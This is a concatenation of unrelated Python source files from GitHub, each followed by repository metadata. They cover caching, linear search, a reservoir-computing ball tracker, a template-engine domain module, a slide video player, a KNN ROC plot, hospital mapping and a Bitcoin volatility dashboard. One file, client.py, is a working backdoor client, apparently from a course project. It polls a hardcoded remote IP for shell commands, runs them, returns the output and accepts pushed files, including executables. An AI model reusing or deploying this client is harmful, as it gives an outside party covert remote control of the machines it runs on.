cache = dc.Cache(tempfile.gettempdir())
elif hydraconfig.get('cache', 'type') == 'memcached':
try:
import pylibmc
cache = pylibmc.Client([hydraconfig.get('cache', 'host', '127.0.0.1')], binary=True)
except ModuleNotFoundError:
log.warning("Unable to find pylibmc. Defaulting to diskcache.")
import diskcache as dc
cache = dc.Cache(tempfile.gettempdir())
def clear_cache():
if hasattr(cache, 'flush_all'):
cache.flush_all() # memcache
else:
cache.clear() # diskcache
|
hydraplatform/hydra-base
|
hydra_base/lib/cache.py
|
cache.py
|
py
| 1,015 |
python
|
en
|
code
| 8 |
github-code
|
6
|
35611313706
|
"""
In this we write an Algorithm for Linear search
"""
# Linear Search:
"""
Linear Search is a algorithm in which we find a given number is present in the array at which index
Example:
array = [1,2 3, 4]
# Number which we need to find at which index: 4
output:3
Because 4 its present at 3rd index
"""
# size of Array
size_of_array = int(input())
# Number which needs to be find
number_find = int(input())
# creating an Array
array = [int(i) for i in input().split(' ')]
# Solution: without using function
"""
Step-1: We iterate on an array of every element
Step-2:we compare every element with a given number
Step-3: if we found that element we will return index number or we not found we return -1
"""
index_number = 0
# iterating on an array
for i in range(size_of_array):
if array[i] == number_find:
index_number = i
# printing a final result
print("index number {} without function solution".format(index_number))
# Solution: with using function
def linear_search(array_with_func_para: list, find_number_with_func: int, size_of_array_with_func_para: int):
"""
this function basically run on linear serach
:param array_with_func_para: array
:param find_number_with_func: number which needs to be find in the array
:param size_of_array_with_func_para: size of array
:return: index number if we found is not, so we will return -1
"""
for i in range(size_of_array_with_func_para):
# comparing every element with find number
if array_with_func_para[i] == find_number_with_func:
# if condition will True, or we found return that index number
return i # i means index
# if not found that number in this array we will return -1
return -1
# calling function
index_number = linear_search(array, number_find, size_of_array)
print("index number {} using function solution".format(index_number))
|
MDTalha178/Python_DSA
|
Array/linear_serach.py
|
linear_serach.py
|
py
| 1,892 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44669737946
|
# https://docs.python.org/3/library/socket.html#socket.SOCK_DGRAM
# used this to learn how to initialize socket.
import ipaddress
# https://www.securecoding.com/blog/how-to-build-a-simple-backdoor-in-python/
# This file itself is an iteration on the client described here.
import socket
import subprocess
import sys
import commands
from commands import Commands
udp_buffer_size = 4096
tcp_buffer_size = 4096
def get_command(request, sock, host, port):
while True:
try:
sock.sendto(commands.to_byte(request), (host, port))
return sock.recv(udp_buffer_size).decode()
except TimeoutError:
print("Timed out, sending new request")
# https://contenttool.io/text-difference-checker
# used this tool to confirm that the read and write functions worked.
def write_list_into_file(name, byte_or_char_type, input_list):
write_target = open(name, 'w{0}'.format(byte_or_char_type))
for current_string in input_list:
write_target.write(current_string)
write_target.close()
DEFAULT_HOST = '172.113.155.186'
DEFAULT_PORT = 4444
DEFAULT_TRANSFER_PORT = 4450
REMOTE_HOST = DEFAULT_HOST
REMOTE_PORT = DEFAULT_PORT
REMOTE_TRANSFER_PORT = DEFAULT_TRANSFER_PORT
if len(sys.argv) > 1:
REMOTE_HOST = sys.argv[1]
if len(sys.argv) > 2:
REMOTE_PORT = int(sys.argv[2])
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
try:
while True:
print("[-] Requesting command...")
command = get_command(Commands.REQUEST, s, REMOTE_HOST, REMOTE_PORT)
if command == 'file':
f = None
tcp_connection = socket.socket()
print("Waiting on file name connection.")
file_name = get_command(Commands.FILENAME, s, REMOTE_HOST, REMOTE_PORT)
is_exe = str.__contains__(file_name, ".exe")
try:
tcp_connection.connect((REMOTE_HOST, REMOTE_TRANSFER_PORT))
f = open(file_name, 'ab' if is_exe else 'a')
current_input = tcp_connection.recv(tcp_buffer_size)
current_input = current_input.decode() if not is_exe else current_input
counter = 0
while commands.str_to_command(current_input) != Commands.END_TRANSFER:
counter += 1
f.write(current_input)
tcp_connection.send(commands.to_byte(Commands.FILE))
current_input = tcp_connection.recv(tcp_buffer_size)
current_input = current_input.decode() if not is_exe else current_input
print(counter)
finally:
tcp_connection.close()
f.close()
s.sendto(b'Finished file transfer.', (REMOTE_HOST, REMOTE_PORT))
elif command is not None:
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = op.stdout.read()
output_error = op.stderr.read()
print("[-] Sending response...")
s.sendto(output + output_error, (REMOTE_HOST, REMOTE_PORT))
except ConnectionAbortedError:
print("Connection severed")
except ConnectionResetError:
print("Connection reset")
finally:
s.close()
|
gavinlampton/CECS378_Group6_Project
|
client.py
|
client.py
|
py
| 3,358 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3083968092
|
import ball_reader
import csv
from StackedESN import StackedESN
import matplotlib.pyplot as plt
import numpy as np
import os
def train_tracker(ball_data_folder, plot_path, networks_count, n_reservoir,
train_cycles=20, test_cycles=10,
alpha=0.8, resSize=100, plot_show=True):
plot_name='tracker'
if not os.path.exists(plot_path+"networks"):
os.makedirs(plot_path+"networks")
#number of time steps
total_n = train_cycles+test_cycles
# Get Data
#return nx2x4x4 pixel color data
# x, y
# switched or not
input_size, output_size1, output_size2, pix_data, output1, output2 = ball_reader.getDataSwitchBalls(ball_data_folder, train_cycles+test_cycles)
# reshape the data to remove dimensions
input_data = pix_data.reshape((total_n,input_size))
data_train, y1_train, y2_train = input_data[:train_cycles], output1[:train_cycles], output2[:train_cycles]
data_test, y1_test, y2_test = input_data[train_cycles:], output1[train_cycles:], output2[train_cycles:]
#save input data
header = "x0,y0"
np.savetxt(plot_path + "input.csv", y1_test, delimiter=",", header=header, fmt='%3f', comments='')
for i in range(networks_count):
esn = StackedESN(n_input=input_size, n_output1=output_size1, n_output2=output_size2, n_reservoir=n_reservoir, leakingRate=0.2, spectralRadius=0.9, regressionParameters=[1e-2])
esn.fit(inputData=data_train, outputData1=y1_train, outputData2=y2_train, transientTime=0, verbose=1)
y1_test_pred, y2_test_pred = esn.predict(inputData=data_test, outputData1=y1_test, outputData2=y2_test, verbose=1) #continuation can be set to false
np.savetxt(plot_path + "track_" + str(i) + ".csv", y1_test_pred, delimiter=",", header=header, fmt='%3f', comments='')
#save network
esn.save(path=plot_path + "networks/" + str(i))
# Prediction Plot
plt.figure('Coordinates Estimation', figsize=(14,7)).clear()
plt.plot(y1_test[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y1_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label='Estimation')
plt.legend()
figname = plot_path + plot_name + "_tracking_" + str(i) + ".png"
plt.savefig(figname)
print('\t[+]Plot saved in', figname)
#if plot_show:
# plt.show()
plt.figure('Switch Estimation', figsize=(14,7)).clear()
#plt.yscale('log')
plt.plot(y2_test[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y2_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label='Estimation')
plt.legend()
figname = plot_path + plot_name + "_switch_" + str(i) + ".png"
plt.savefig(figname)
print('\t[+]Plot saved in', figname)
#if plot_show:
# plt.show()
def evaluate_tracker(plot_path, ball_data_folder, esn_path, steps, offset):
plot_name='tracker'
esn = StackedESN.load(esn_path)
input_size, output_size1, output_size2, pix_data, output1, output2 = ball_reader.getDataChangeBall(ball_data_folder, steps, offset=offset)
# reshape the data to remove dimensions
input_data = pix_data.reshape((steps,input_size))
dummy_switch_info = np.zeros((output2.shape))
y_test_pred, _ = esn.predict(inputData=input_data, outputData1=output1, outputData2=dummy_switch_info, verbose=1, continuation=False)
plt.figure('Change Estimation', figsize=(14,7)).clear()
plt.plot(output1[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label="Estimation")
plt.plot(output2[:,0]*100, color='black', linewidth=2, label="Ball color")
plt.legend()
figname = plot_path + plot_name + "_change.png"
plt.savefig(figname)
#save in csv file
header = "x0,y0"
np.savetxt(plot_path + "evaluation_data.csv", output1, delimiter=",", header=header, fmt='%3f', comments='')
header = "x0,y0"
np.savetxt(plot_path + "evaluated_data.csv", y_test_pred, delimiter=",", header=header, fmt='%3f', comments='')
plt.show()
if __name__=='__main__':
ball_data_folder = "../data/switch_balls/" #"../data/changing_ball/"
data_path = 'cb_results/switch_balls/'
main_balls_count = 2
train_cycles = 800
test_cycles = 200
n_reservoir = 50
#train_tracker(ball_data_folder=ball_data_folder, plot_path=data_path, networks_count=1, train_cycles = train_cycles, test_cycles=test_cycles, n_reservoir=n_reservoir)
evaluate_tracker(plot_path=data_path, ball_data_folder="../data/changing_ball/", esn_path=data_path+"networks/0", steps=500, offset=0)
|
ksk-S/DynamicChangeBlindness
|
workspace_models/echo_state_network/switch_tracker.py
|
switch_tracker.py
|
py
| 4,370 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21188550409
|
class Solution:
def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:
dist = []
for i in range(len(points)):
dist.append([sqrt(points[i][0] ** 2 + points[i][1] ** 2), points[i]]) #getting the
dist.sort() # √ of square numbers in points then appennding it
out = [] # sorting it to get the nearest pointt
for i in range(k): # appending answer then printing it
out.append(dist[i][1])
return out
|
AhmedMaherTohmay/IEEE-ZSB-Technica1-Rookies-23
|
task7/p3.py
|
p3.py
|
py
| 562 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10294260342
|
__url__ = "$URL: svn://gizmojo.org/pub/evoque/trunk/domain.py $"
__revision__ = "$Id: domain.py 1153 2009-01-20 11:43:21Z mario $"
import sys, logging
from evoque.collection import Collection
from evoque.evaluator import set_namespace_on_dict, xml
def get_log():
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s")
return logging.getLogger("evoque")
# $begin{init}
class Domain(object):
""" A registry of collections """
def __init__(self, default_dir,
restricted=False, errors=3, log=get_log(),
# defaults for Collections
cache_size=0, auto_reload=60, slurpy_directives=True,
# defaults for Collections (and Templates)
quoting="xml", input_encoding="utf_8", filters=[]):
"""
default_dir: either(str, Collection)
abs path, or actual default collection instance
restricted: bool
restricted evaluation namespace
errors: int
["silent", "zero", "name", "render", "raise"]
log: the logging.getLogger("evoque") logger; may be pre-initialized
and passed in, or adjusted as needed after initialization.
Default settings (via loggin.basicConfig()) are:
handler=StreamHandler()
level=logging.INFO
format="%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s"
# Defaults for Collections (and Templates)
cache_size: int
max number loaded templates in collection
0 means unlimited loaded templates
auto_reload: int
min seconds to wait to check if needs reloading
0 means check on every rendering
slurpy_directives: bool
consume all whitespace trailing a directive
quoting: either("xml", "str", type)
"xml" -> qpy.xml, "str" -> unicode
input_encoding: str
hint for how to decode template source
filters: [callable]
list of template post-evaluation filter functions
"""
# $end{init}
self.restricted = restricted
self.errors = errors
self.log = log # the logging.getLogger("evoque") logger
# defaults -- cascaded down to collections
self.cache_size = cache_size
self.auto_reload = auto_reload
self.slurpy_directives = slurpy_directives
self.quoting = quoting
self.input_encoding = input_encoding
self.filters = filters
#
self.collections = {} # by collection name
# default collection
if isinstance(default_dir, Collection):
self.collections[default_dir.name] = default_dir
self.default_collection = default_dir
else:
self.set_collection("", default_dir, cache_size, auto_reload,
slurpy_directives, quoting, input_encoding, filters)
self.default_collection = self.collections[""]
#
self.globals = {}
self.globals['xml'] = xml
if self.restricted:
restrict_execution_namespace(self.globals)
def set_on_globals(self, name, value):
""" (name:str, value:any) -> None
"""
self.globals[name] = value
def set_namespace_on_globals(self, name, obj, no_underscored=True):
""" (name:either(str, None), obj:any, no_underscored:bool) -> None
If name is None, the obj's namespace will be set onto top-level.
"""
set_namespace_on_dict(self.globals, name, obj, no_underscored)
def get_collection(self, name=None):
""" (name:either(None, str, Collection)) -> Collection
"""
if name is None:
return self.default_collection
if isinstance(name, Collection):
name = name.name
return self.collections[name]
def set_collection(self, name, dir,
cache_size=None, auto_reload=None, slurpy_directives=None,
quoting=None, input_encoding=None, filters=None):
""" (name:str, dir:str,
cache_size:int, auto_reload:int, slurpy_directives:bool,
quoting:either(str, type), input_encoding:str,
filters:either(None, [callable])) -> None
"""
if self.has_collection(name):
raise ValueError(
"Domain already has a collection named [%s]" % (name))
self.collections[name] = Collection(self, name, dir,
cache_size, auto_reload, slurpy_directives, quoting,
input_encoding, filters)
def has_collection(self, name):
""" (name:str -> bool
"""
return name in self.collections
def get_template(self, name, src=None, collection=None, raw=None,
data=None, quoting=None, input_encoding=None, filters=None):
""" Wraps Collection.get_template()
"""
return self.get_collection(collection).get_template(name,
src, raw, data, quoting, input_encoding, filters)
def set_template(self, name, src=None, collection=None, raw=None,
data=None, from_string=True,
quoting=None, input_encoding=None, filters=None):
""" Wraps Collection.set_template()
"""
self.get_collection(collection).set_template(name, src,
raw, data, from_string, quoting, input_encoding, filters)
def has_template(self, name, collection=None):
""" Wraps Collection.has_template()
"""
return self.get_collection(collection).has_template(name)
def restrict_execution_namespace(namespace):
""" (namespace:dict) -> None
Modifies the namespace dict parameter to add entries for builtins deemed
safe, and sets a dummy __builtins__ empty dict.
"""
# here type(__builtins__) is dict (not module as in the interpreter)
import inspect
# In python 2.4, BaseException is not avialable
BaseException_ = __builtins__.get('BaseException', Exception)
for name, obj in __builtins__.items():
if name in DISALLOW_BUILTINS:
continue
if inspect.isbuiltin(obj) or \
(inspect.isclass(obj) and not issubclass(obj, BaseException_)) or \
(obj in (None, True, False)):
namespace[name] = obj
namespace["__builtins__"] = {}
# Potentially unsafe __builtins__ in python 2.5 that will be removed from
# execution namespace (in addition to all subclasses of BaseException).
# $begin{unsafe}
DISALLOW_BUILTINS = ["_", "__debug__", "__doc__", "__import__", "__name__",
"buffer", "callable", "classmethod", "coerce", "compile", "delattr", "dir",
"eval", "execfile", "exit", "file", "getattr", "globals", "hasattr", "id",
"input", "isinstance", "issubclass", "locals", "object", "open", "quit",
"raw_input", "reload", "setattr", "staticmethod", "super", "type", "vars"]
# $end{unsafe}
# why "object" is included, see:
# http://groups.google.com/group/comp.lang.python/msg/5639e1b5cdac3ac2
|
phonybone/Rnaseq
|
ext_libs/evoque/domain.py
|
domain.py
|
py
| 7,129 |
python
|
en
|
code
| 3 |
github-code
|
6
|
45180348436
|
#判断一个视频是否属于幽默类还是实用类
import numpy as np
import operator
from matplotlib import pyplot as plt
def traindataset():
datagroup=np.loadtxt('C:\\Users\\Dell\Desktop\\classification\\diabetes_train.txt',dtype=float,delimiter=',')
dataset=datagroup[:,1:]
label=datagroup[:,0]
return dataset,label
def testdataset():
datagroup=np.loadtxt('C:\\Users\\Dell\Desktop\\classification\\diabetes_test.txt',dtype=float,delimiter=',')
dataset=datagroup[:,1:]
label=datagroup[:,0]
return dataset,label
def K_classify(test,datagroup,label,k,p):#p-阈值
datasize=datagroup.shape[0]#计算已知数据的行数
test0=np.tile(test,(datasize,1))-datagroup#将测试集与已知数据形式相同,再相减
distance0=(test0**2).sum(1)#平方和
distance=distance0**0.5#开方算欧氏距离
listsy=distance0.argsort()#距离从小到大按索引(下标)排序
classcount={}#创建一个空字典
num0=0
num1=0
for i in range(k):
label0=label[listsy[i]]
classcount[label0]=classcount.get(label0,0)+1#计算各类别的次数
if label0==0:
num0+=1
else:
num1+=1
nums=num0+num1
if num1/nums >= p:
return 1
else:
return 0
if __name__=='__main__':
datagroup,label=traindataset()
test,truelabels=testdataset()
predict=[]
Ps=[(n/100) for n in range(101)]#改变阈值
a=-1
b=0
AUC=0.0
TPR=[]
FPR=[]
for p in Ps:
for i in range(len(test)):
predict.append(K_classify(test[i],datagroup,label,150,p))
tp=0
fp=0
tn=0
fn=0
for j in range(len(test)):
if predict[j]==truelabels[j]:
if predict[j]==1:
tp+=1
else:
tn+=1
else:
if predict[j]==1:
fp+=1
else:
fn+=1
fpr=fp/(fp+tn)
tpr=tp/(tp+fn)
print(fpr)
AUC+=(a+tpr)*(b-fpr)/2#微元法算梯形面积求AUC
a=tpr
b=fpr
TPR.append(tpr)
FPR.append(fpr)
del predict[:]
plt.plot(FPR,TPR)
plt.xlabel('FPR')
plt.ylabel('TPR')
plt.title('ROC曲线')
plt.rcParams['font.sans-serif'] = ['SimHei']#显示中文
plt.grid()#网格线
x=[(n/10) for n in range(11)]
y=[(n/10) for n in range(11)]
plt.xticks(x)
plt.yticks(y)
print('AUC=',AUC)
plt.show()
|
lijiaming666/Python_demo
|
K近邻法+ROC.py
|
K近邻法+ROC.py
|
py
| 2,540 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
16462145161
|
import cv2
import numpy as np
# np.set_printoptions(threshold=np.inf)
import time
from collections import deque
import threading
# Low Quality
# PAUSE_INDICATOR = (-1, 0)
# RESOLUTION = "480p15"
# FPS = 15
# Production quality
PAUSE_INDICATOR = (-1, 0)
RESOLUTION = "1440p60"
FPS = 60
cv2.namedWindow("Frame", 0);
cv2.resizeWindow("Frame", 2560, 1440)
cv2.namedWindow("Frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Frame",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)
scenes = [
"TitleScreen",
"Outline",
"Newton",
"SchrodingerEquation",
"HarmonicOscillator",
"VMC",
"WhatToGuess",
"PsiDesign",
"NewIdea",
"NetworkDisplay",
"QDResults",
"HeliumResults",
"Conclusions",
"FutureProspects",
"ThankYou",
]
scenes = [
("media/videos/presentation/{}/" + s + ".mp4").format(RESOLUTION) for s in scenes
]
class Manager:
def __init__(self, scenes):
self.scenes = scenes
self.active_scene = cv2.VideoCapture(self.scenes[0])
self.forward = deque()
self.current_scene = 0
self.frame = 0
self.lock = threading.Lock()
self.last_scene = len(scenes) - 1
self.keep_running = True
def stop(self):
self.lock.acquire()
self.keep_running = False
self.active_scene.release()
self.lock.release()
def run(self):
while self.keep_running:
self.lock.acquire()
if len(self.forward) >= FPS:
self.lock.release()
time.sleep(1 / FPS / 5)
continue
if not self.active_scene.isOpened():
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
if self.active_scene.isOpened():
ret, frame = self.active_scene.read()
if ret:
self.forward.append(frame)
else:
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(
self.scenes[self.current_scene]
)
self.lock.release()
def next_frame(self):
self.lock.acquire()
frame = self.forward.popleft() if self.forward else None
self.lock.release()
return frame
def play(self):
paused = False
indicator_present = False
t0 = 0
while True:
t1 = time.time()
wait_time = max(1, int(900 * (1 / FPS - (t1 - t0)))) * int(not paused)
key = cv2.waitKey(wait_time) & 0xFF
if key == ord("q"):
self.stop()
break
elif key == ord(" "):
paused = not paused
continue
elif key == 83:
for _ in range(FPS // 2):
frame = self.next_frame()
if frame is not None:
cv2.imshow("Frame", frame)
elif key == 81:
self.active_scene.release()
self.current_scene = max(0, self.current_scene - 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
paused = False
elif key == ord('n'):
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
paused = False
elif key != 0xFF:
print("\rUnknown key pressed:", key)
print(f"{1 / (t1 - t0):.2f}", end="\r")
if not paused:
frame = self.next_frame()
if frame is not None:
ind_pres = (
frame[PAUSE_INDICATOR][0] == 0
and frame[PAUSE_INDICATOR][1] == 0
and frame[PAUSE_INDICATOR][2] >= 224
)
if indicator_present and not ind_pres:
paused = True
indicator_present = ind_pres
cv2.imshow("Frame", frame)
t0 = t1
if __name__ == "__main__":
manager = Manager(scenes)
load_thread = threading.Thread(target=manager.run)
load_thread.start()
manager.play()
cv2.destroyAllWindows()
# i = 0
# paused = False
# direction = 1
# prev, prev_stop_frame, t0 = 0, 0, 0
# while True:
# frame = frames[i]
# cv2.imshow("Frame", frame)
# delta = time.time() - t0
# wait_time = max(1, int(1000 * (1 / FPS - delta))) * int(not paused)
# key = cv2.waitKey(wait_time) & 0xFF
# if key == ord(" "):
# paused = not paused
# prev_stop_frame = i
# elif key == 81:
# i = max(0, i - FPS // 2)
# elif key == 85:
# i = min(len(frames - 1), i + FPS // 2)
# elif key == ord("q"):
# break
# elif key == ord("h"):
# direction = -1
# elif key == ord("l"):
# direction = 1
# elif (
# not paused
# and abs(i - prev_stop_frame) > FPS_SOURCE / 2
# and np.all(frame == prev)
# and False
# ):
# paused = True
# prev_stop_frame = i
# prev = frame
# t0 = time.time()
# i = max(0, min(len(frames) - 1, i + direction))
|
bsamseth/masters-presentation
|
player.py
|
player.py
|
py
| 5,552 |
python
|
en
|
code
| 2 |
github-code
|
6
|
2799581400
|
import streamlit as st
import pandas_ta as ta
import pandas as pd
import yfinance as yf
import pandas as pd; import numpy as np
st.title("Volatility Dashboard")
st.sidebar.title("selection")
option = st.sidebar.selectbox("options",('long signal', 'short signal', 'data frame', 'Important dates', 'implinks'))
st.subheader(option)
df = yf.download('BTC-USD', period='6mo', interval='1h')
df = df.reset_index()
# Step: Change data type of Date to Datetime
df = df.rename(columns={'index': 'Date'})
df['Volatility Open'] = df['Open'].rolling(window=10).std()
df['Volatility High'] = df['High'].rolling(window=10).std()
df['Volatility Low'] = df['Low'].rolling(window=10).std()
df['Volatility Close'] = df['Close'].rolling(window=10).std()
newdf=df[['Datetime','Volatility Open','Volatility High','Volatility Low','Volatility Close']]
newdf=newdf.set_index('Datetime')
newdf=newdf.dropna()
newdf = newdf.rename_axis('Date')
newdf.index = pd.to_datetime(newdf.index)
newdf.index = newdf.index.tz_localize(None)
f = pd.read_csv('https://raw.githubusercontent.com/suparn2304/volatility-dashboard/main/vol1%20harmonic.csv', index_col=0)
f = f.rename_axis('Date')
f.index = pd.to_datetime(f.index)
f = f.rename(columns={'0.0000000': 'forier'})
new_dates = pd.date_range(start=newdf.index.min(), end='2023-05-23 10:00:00', freq='1h')
updated_index = newdf.index.append(new_dates)
newdf = newdf[~newdf.index.duplicated(keep='first')]
newdf = newdf.reindex(updated_index)
newdf.index = pd.to_datetime(newdf.index)
merged_df = pd.merge(newdf, f, how='left', left_index=True, right_index=True)
merged_df.index = pd.to_datetime(merged_df.index, infer_datetime_format=True)
merged_df = merged_df.rename(columns={'Volatility Open': 'Open', 'Volatility Close': 'Close', 'Volatility High': 'High', 'Volatility Low': 'Low'})
merged_df = merged_df.fillna(method='ffill')
merged_df = merged_df[~merged_df.index.duplicated(keep='first')]
merged_df['fut1'] = merged_df['forier'].shift(-1)
merged_df['fut2'] = merged_df['forier'].shift(-2)
merged_df['fut3'] = merged_df['forier'].shift(-3)
merged_df['fut4'] = merged_df['forier'].shift(-4)
merged_df['fut5'] = merged_df['forier'].shift(-5)
merged_df['zscore'] = ta.zscore(merged_df['Close'], length=20, std=1)
merged_df = merged_df.rename_axis('Date')
merged_df['forier_plot'] = merged_df['forier']*100
merged_df['fut1'] = merged_df['forier'].shift(-1)
merged_df['fut2'] = merged_df['forier'].shift(-2)
merged_df['fut3'] = merged_df['forier'].shift(-3)
merged_df['fut4'] = merged_df['forier'].shift(-4)
merged_df['fut5'] = merged_df['forier'].shift(-5)
entry_points = pd.DataFrame(columns=['Date', 'Entry_Price'])
# Set the threshold for the z-score
zscore_threshold = -0.7999
# Loop through the rows in the DataFrame
for i in range(len(merged_df)):
# Check if the conditions are met for entering a trade
if (merged_df.iloc[i].fut3 > merged_df.iloc[i].fut2 > merged_df.iloc[i].fut1) and \
(merged_df.iloc[i].zscore > zscore_threshold) and \
(merged_df.iloc[i-1].zscore < zscore_threshold):
# Record the entry point
entry_points = entry_points.append({'Date': merged_df.iloc[i].name,
'Entry_Price': merged_df.iloc[i].Close},
ignore_index=True)
ohlc_df = pd.DataFrame()
ohlc_df.index = merged_df.index
ohlc_df['Open'] = merged_df['Open']
ohlc_df['High'] = merged_df['High']
ohlc_df['Low'] = merged_df['Low']
ohlc_df['Close'] = merged_df['Close']
if option == 'data frame':
st.dataframe(ohlc_df)
df_callendar = pd.read_csv('https://raw.githubusercontent.com/suparn2304/volatility-dashboard/main/calendar-event-list.csv', index_col=0)
df_callendar.index = pd.to_datetime(df_callendar.index)
calllendar_df = pd.merge(ohlc_df, df_callendar, how='left', left_index=True, right_index=True)
calllendar_df = calllendar_df.dropna()
if option == 'Important dates':
st.dataframe(df_callendar)
import plotly.graph_objects as go
fig = go.Figure(data= [go. Candlestick (
x = ohlc_df.index,
open = ohlc_df.Open,
high = ohlc_df.High,
low = ohlc_df.Low,
close = ohlc_df.Close
)])
fig.add_trace(go.Scatter(
x=entry_points.Date,
y=entry_points.Entry_Price,
mode= "markers",
marker_symbol="diamond-dot",
marker_size = 13,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(0,255,0,0.7)",
))
fig.add_trace(go.Scatter(
x=calllendar_df.index,
y=calllendar_df.Close,
mode= "markers",
marker_symbol="x",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.update_layout (xaxis_rangeslider_visible=False)
if option == 'long signal':
st.plotly_chart(fig)
st.dataframe(entry_points)
entry_points_short = pd.DataFrame(columns=['Date', 'Entry_Price'])
# Set the threshold for the z-score
zscore_threshold = 0.7999
# Loop through the rows in the DataFrame
for i in range(len(merged_df)):
# Check if the conditions are met for entering a trade
if (merged_df.iloc[i].fut3 < merged_df.iloc[i].fut2 < merged_df.iloc[i].fut1) and \
(merged_df.iloc[i].zscore < zscore_threshold) and \
(merged_df.iloc[i-1].zscore > zscore_threshold):
# Record the entry point
entry_points_short = entry_points_short.append({'Date': merged_df.iloc[i].name,
'Entry_Price': merged_df.iloc[i].Close},
ignore_index=True)
import plotly.graph_objects as go
fig = go.Figure(data= [go. Candlestick (
x = ohlc_df.index,
open = ohlc_df.Open,
high = ohlc_df.High,
low = ohlc_df.Low,
close = ohlc_df.Close
)])
fig.add_trace(go.Scatter(
x=entry_points_short.Date,
y=entry_points_short.Entry_Price,
mode= "markers",
marker_symbol="diamond-dot",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.add_trace(go.Scatter(
x=calllendar_df.index,
y=calllendar_df.Close,
mode= "markers",
marker_symbol="x",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.update_layout (xaxis_rangeslider_visible=False)
if option == 'short signal':
st.plotly_chart(fig)
st.dataframe(entry_points_short)
if option == 'implinks':
st.write("gmx top trader account [link](https://www.gmx.house/arbitrum/account/0x48202a51c0d5d81b3ebed55016408a0e0a0afaae)")
st.write("gmx top trader account 2 [link](https://www.gmx.house/arbitrum/account/0xe8c19db00287e3536075114b2576c70773e039bd)")
st.write("bookmap [link](https://web.bookmap.com/?duration=10m)")
st.write("tradinglite [link](https://www.tradinglite.com/)")
|
carolinedlu/volatility-dashboard
|
dashboard.py
|
dashboard.py
|
py
| 7,458 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29699780347
|
import pandas as pd
import numpy as np
import geopandas as gpd
import matplotlib.pyplot as plt
from scipy import ndimage
import geoplot
import matplotlib.pylab as pylab
# import geoplot as gp
from models import Simulation, NTAGraphNode, DiseaseModel
def read_hospital_data(filename):
df = pd.read_csv(filename, sep=",", header=None, encoding="ISO-8859-1")
# Remove extraneous commas/columns after last column
df = df.drop([1, 2, 3, 4], axis=1)
df.columns = [
"name",
"lat",
"long",
"bed_count",
]
df["lat"] = df.lat.astype(float)
df["long"] = df.long.astype(float)
return df
def read_nta_data(filename):
df = pd.read_csv(filename, sep=",", header=None, encoding="ISO-8859-1")
# Remove extraneous commas/columns after last column
df = df.loc[:, :6]
# Rename columns to use for indexing
df.columns = [
"borough",
"nta_code",
"nta_name",
"population",
"lat",
"long",
"hospitalization_rate",
]
df["lat"] = df.lat.astype(float)
df["long"] = df.long.astype(float)
df["hospitalization_rate"] = df.hospitalization_rate.astype(float)
return df
def write_parsed_data(df, filename):
with open(filename, "w") as f:
for row in df.itertuples(index=False, name=None):
f.write("{}\n".format(row))
def show_kdeplot(shape, gdf):
ax = geoplot.polyplot(shape, projection=geoplot.crs.AlbersEqualArea(), zorder=1)
geoplot.kdeplot(
gdf,
ax=ax,
shade=True,
cmap="Reds",
n_levels=16,
shade_lowest=True,
clip=shape.simplify(0.001, preserve_topology=False),
)
geoplot.pointplot(gdf, ax=ax, color="blue")
plt.show()
NTAs = read_nta_data("New York Pop NTA updated.csv")
hospitals = read_hospital_data("NYC Hospital Locations Filled.csv")
zipfile = "zip:///home/kevin/code/Comp-Epi-Project/shape/shapefile.zip"
shape = gpd.read_file(zipfile)
gdf = gpd.GeoDataFrame(
hospitals,
geometry=gpd.points_from_xy(hospitals["long"], hospitals["lat"]),
crs="epsg:4326",
)
gdf2 = gpd.GeoDataFrame(
NTAs, geometry=gpd.points_from_xy(NTAs["long"], NTAs["lat"]), crs="epsg:4326",
)
##################
# choropleth WIP #
##################
NTAs_d = dict(gdf2)
shape_d = dict(shape)
for i, ntacode in NTAs_d["nta_code"].items():
indexes = [k for k, v in shape_d["ntacode"].items() if ntacode == v]
if indexes:
assert len(indexes) == 1
index = indexes.pop()
NTAs_d["geometry"][i] = shape_d["geometry"][index]
else:
print(ntacode, shape_d["ntaname"][i])
new_NTAs = pd.DataFrame(NTAs_d)
gdf3 = gpd.GeoDataFrame(new_NTAs, geometry=new_NTAs.geometry)
print(gdf3.head(100))
# show_kdeplot(shape, gdf)
geoplot.choropleth(
gdf3,
projection=geoplot.crs.AlbersEqualArea(),
hue="hospitalization_rate",
cmap="Greens",
legend=True,
edgecolor="black",
linewidth=1,
)
plt.show()
|
cwaldron97/Comp-Epi-Project
|
hospitals.py
|
hospitals.py
|
py
| 2,990 |
python
|
en
|
code
| 0 |
github-code
|
6
|
